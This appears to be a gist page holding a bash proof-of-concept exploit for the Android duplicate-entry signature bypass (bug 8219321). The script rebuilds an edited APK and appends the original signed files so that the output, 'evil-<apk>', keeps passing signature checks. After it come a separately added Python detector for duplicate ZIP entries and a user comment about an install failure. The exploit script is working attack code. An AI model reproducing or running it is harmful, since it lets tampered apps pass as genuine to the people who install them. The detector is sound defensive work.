Quick & dirty PoC for Android bug 8219321 discovered by BlueboxSec
```bash
#!/bin/bash
# PoC for Android bug 8219321 by @pof
# +info: https://jira.cyanogenmod.org/browse/CYAN-1602
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
#apktool d $APK out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
java -jar apktool.jar b out out.apk
#apktool b out out.apk
mkdir tmp
cd tmp/
unzip ../$APK
mv ../out.apk .
cat >poc.py <<-EOF
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-$APK
cd ..
rm -rf tmp out
echo "Modified APK: evil-$APK"
```
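
The script above appends the original APK's files to the rebuilt archive with `zipfile` in append mode, so the output holds two entries under each of those names. A defensive check for that condition follows, as an added example that is not part of the gist; the function names and the in-memory sample archive are constructed for illustration.

```python
import io
import warnings
import zipfile
from collections import defaultdict


def duplicate_entries(apk):
    """Map each repeated entry name to its [(header_offset, crc32, size), ...].

    `apk` is a path or a seekable binary file object.
    """
    seen = defaultdict(list)
    with zipfile.ZipFile(apk) as z:
        # infolist() keeps every central-directory record, repeats included
        for info in z.infolist():
            seen[info.filename].append((info.header_offset, info.CRC, info.file_size))
    return {name: recs for name, recs in seen.items() if len(recs) > 1}


def conflicting_entries(apk):
    """Names whose duplicate records do not all carry the same CRC-32."""
    return sorted(name for name, recs in duplicate_entries(apk).items()
                  if len({crc for _, crc, _ in recs}) > 1)


def build_sample():
    """Constructed in-memory archive: classes.dex stored twice with differing bytes."""
    buf = io.BytesIO()
    with warnings.catch_warnings():
        warnings.simplefilter("ignore", UserWarning)  # zipfile warns on duplicate names
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr("AndroidManifest.xml", b"<manifest/>")
            z.writestr("classes.dex", b"constructed payload A")
            z.writestr("classes.dex", b"constructed payload B")
            z.writestr("res/raw/a.txt", b"same")
            z.writestr("res/raw/a.txt", b"same")
    buf.seek(0)
    return buf


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample()
    for name, recs in duplicate_entries(target).items():
        print(name, recs)
```

Any non-empty result is worth rejecting or flagging, since a well-formed APK has no reason to repeat an entry name; `conflicting_entries` narrows the list to names whose copies differ in content.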
I tried with the script. Also, I've tried adding a duplicate classes.dex alone in the APK and trying to install it on a device, but I was unable to install it.
Failure [INSTALL_PARSE_FAILED_CERTIFICATE_ENCODING]
Even with the old Android versions. Any idea what I am missing?